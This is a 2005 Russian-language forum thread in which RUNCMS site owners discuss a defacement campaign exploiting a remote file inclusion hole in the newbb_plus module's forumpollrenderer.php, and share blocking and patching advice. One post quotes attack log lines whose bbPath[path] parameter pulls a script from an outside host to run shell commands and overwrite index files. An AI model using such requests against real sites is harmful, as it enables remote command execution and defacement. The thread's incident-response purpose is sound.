Сайт сообщества | Клуб пользователей | О проекте

Имя
Пароль
ПравилаРегистрацияСправка
Сообщения за деньПоиск

Вернуться   Клуб пользователей портальной системы RUNCMS > Портал > Безопасность

Ответ
 
Опции темы Опции просмотра
Manga вне форума Manga
Далекая Радуга

Аватар для Manga

| Цитировать Старый #31 09-17-2005, 16:15

Сделайте, плиз, и для newbb plus 0.70
Много форумов стоит, в каждом файле не наисправляешься.


Для девочек

Посетить домашнюю страницу Manga
  Сообщения: 682 c 08.03.2004 | Репутация: 11
DR вне форума DR
Старший участник

Аватар для DR

| Цитировать Старый #32 09-17-2005, 16:38

Прислал мой хостер.
Вот вам часть репорта дежурного администратора:

Вот как был закачан index.html
==================
201.17.185.104 - - [17/Sep/2005:03:28:15 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.megahostbr.com/a1ts/cse.gif?&cmd=id HTTP/1.1" 200 2561 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
201.17.185.104 - - [17/Sep/2005:03:30:24 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.megahostbr.com/a1ts/cse.gif?&dx=1&hostxpl=http://216.111.31.2/index2.html&storage=/home/b155/public_html/e-xoopport/index.html HTTP/1.1" 200 2287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
201.17.185.104 - - [17/Sep/2005:03:30:28 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.megahostbr.com/a1ts/cse.gif?&dx=1&hostxpl=http://216.111.31.2/index2.html&storage=/home/b155/public_html/e-xoopport/index.php HTTP/1.1" 200 2287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
201.17.185.104 - - [17/Sep/2005:03:30:33 +0400] "GET / HTTP/1.1" 200 1068 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
201.17.185.104 - - [17/Sep/2005:03:31:43 +0400] "GET /favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
201.17.185.104 - - [17/Sep/2005:03:31:53 +0400] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.megahostbr.com/a1ts/cse.gif?&cmd=ls%20/home/b155/public_html HTTP/1.1" 200 3123 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
201.17.185.104 - - [17/Sep/2005:03:37:27 +0400] "GET / HTTP/1.1" 200 1068 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
201.17.185.104 - - [17/Sep/2005:08:43:14 +0400] "GET / HTTP/1.1" 304 - "http://www.zone-h.org/en/defacements" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
==================
IP адрес из Бразилии - анонимный прокси.

Также ВОЗМОЖНО к злоумышленникам имеют отношение следующие IP адреса:
====================
68.164.249.26 - - [17/Sep/2005:06:26:27 +0400]"GET / HTTP/1.1" 200 1068 "http://www.zone-h.org/en/defacements/view/id=2867260/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
85.232.96.245 - - [17/Sep/2005:14:50:45 +0400] "GET / HTTP/1.1" 302 133 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
85.232.96.245 - - [17/Sep/2005:14:50:46 +0400] "GET /modules/news/ HTTP/1.1" 200 8583 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
85.232.96.245 - - [17/Sep/2005:14:50:53 +0400] "GET / HTTP/1.1" 302 133 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
85.232.96.245 - - [17/Sep/2005:14:50:53 +0400] "GET /themes/ex-dr/date-russian.js HTTP/1.1" 304 - "http://www.e-xoopport.ru/modules/news/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
====================

Ip заблокированы,
все запросы где есть строка "bbPath[path]=" тоже заблокированы.

Злоумышленникам запустить эксплоит запустить не удалось.
уязвимость в
/modules/newbb_plus/class/forumpollrenderer.php
при запросе
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=xxxxx

файл forumpollrenderer.php переименован.


Будьте внимательны и примите меры к устранению уязвимости!


Nosce te iptium // Познай самого себя
  Сообщения: 804 c 24.05.2004 | Репутация: 18
flagman вне форума flagman
Нерешительный


| Цитировать Старый #33 09-17-2005, 17:05

блин, чего людям спокойно не живется...

  Сообщения: 4 c 28.08.2005 | Репутация: 1
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #34 09-17-2005, 17:07

Цитата:
Sponsor:
LARK*эти файлы должны лежать после взлома или до? и где они могут находится?
После взлома, но не обязательно. Все дело в том, что эксплоит предназначен, для нескольких действий, поэтому могли просто сменить индекс, а могли и закачать эти файлы.

Цитата:
pan:
Ларк, а где смотреть то файлы ?
теоретически где угодно, хотя изначально запись идет в папку /tmp/ - зависит от того откуда запускают эксплоит.

Цитата:
westex:
И не обязательно файлы с таким расширением. Тот же RenView зальют и дело в шляпе. И будет файл называться index.php в каклй нить дире */languages/
Просто расчет на то, что балуются ПиОнЭры которые не очень понимают, что они делают.

Цитата:
DR:
файл forumpollrenderer.php переименован.
Не надо его переименовывать - как уже писалось в начале файла прописать:

if (!defined('XOOPS_ROOT_PATH')) {
exit();
}

Ну а у тех, у кого Newbb Plus 0.81 или 0.82 ставить выложенные заплатки


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
flagman вне форума flagman
Нерешительный


| Цитировать Старый #35 09-17-2005, 17:14

такой вопрос, а Бывший стандартный форум E-Xoops/RUNCMS с версии 1.1 NewBB для RUNCMS ver 1.02 дырявая или уже проверенна временем?

  Сообщения: 4 c 28.08.2005 | Репутация: 1
DR вне форума DR
Старший участник

Аватар для DR

| Цитировать Старый #36 09-17-2005, 17:29

LARK*Да знаю, это хостер написал, и переименовал сам, даже после того как я заплатку поставил.
Справедливо наверно для всех newbb_plus, у порта так 0.70...
Искал, вроеде не нашел, по логам хостера вроде бы был только залит index.html


Nosce te iptium // Познай самого себя
  Сообщения: 804 c 24.05.2004 | Репутация: 18
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #37 09-17-2005, 17:31

Цитата:
flagman:
такой вопрос, а Бывший стандартный форум E-Xoops/RUNCMS с версии 1.1 NewBB для RUNCMS ver 1.02 дырявая или уже проверенна временем?
Этим форумом уже никто не занимается, дырки там есть, причем такие которые в NewBB Plus были закрыты.

Цитата:
DR:
IP адрес из Бразилии - анонимный прокси.
К нам вчера вот по такому адресу лезли - 201.24.2.195


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
Vinni вне форума Vinni
Участник


| Цитировать Старый #38 09-17-2005, 17:48

Цитата:
Сообщение от LARK

теоретически где угодно, хотя изначально запись идет в папку /tmp/ - зависит от того откуда запускают эксплоит.
ко мне тоже сегодня ломились с 201.17.185.104
в логах осталось [Sat Sep 17 00:09:51 2005] [error] PHP Fatal error: Call to undefined function: posix_getuid() in http://www.megahostbr.com/a1ts/cse.g...uage//main.php on line 12

следов взлома не заметил, но вот нашел странный файл с chmod 600
в tmp/phpCnDTHi (но создан был 15.09)

изменить chmod и удалить его не получается

Последний раз редактировалось Vinni, 09-17-2005 в 18:11

  Сообщения: 159 c 04.07.2005 | Репутация: 1
SVL вне форума SVL
Младший участник


| Цитировать Старый #39 09-17-2005, 18:03

Цитата:
LARK:
К нам вчера вот по такому адресу лезли - 201.24.2.195
Бразилия хулиганит, вот такой ещё нарисовался 201.17.185.104


Желаю, чтобы все!!!
Посетить домашнюю страницу SVL
  Сообщения: 26 c 19.01.2005 | Репутация: 2
DR вне форума DR
Старший участник

Аватар для DR

| Цитировать Старый #40 09-17-2005, 19:00

А вот это вы видали!!! Пачками!!!
http://www.zone-h.org/defacements/fi...r_defacer=A1TS
Сколько уже русских сайтов задифейсили!
Что за сайт не пойму, таких надо по почкам!
Фтыкать всем! Они разошлись, кроме подмены есть и полный подмен
(я попал на подмен только главной),
даже по русски
http://www.zone-h.org/ru/defacements...r=A1TS/page=1/

ПиОнеРы рядом!!! Русские сайты дифейсят!

Последний раз редактировалось DR, 09-17-2005 в 19:09


Nosce te iptium // Познай самого себя
  Сообщения: 804 c 24.05.2004 | Репутация: 18
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Рейтинг@Mail.ru Хостинг провайдер Majordomo. Powered by: vBulletin Version 3.0
Copyright ©2000-2024, Jelsoft Enterprises Ltd.
Все разделы прочитаны - Руководство форума - Архив - Вверх
Rambler's Top100
Output: 87.96 Kb. compressed to 80.62 Kb. by saving 7.35 Kb. (8.35%)
Page generated in 0.25167 seconds with 11 queries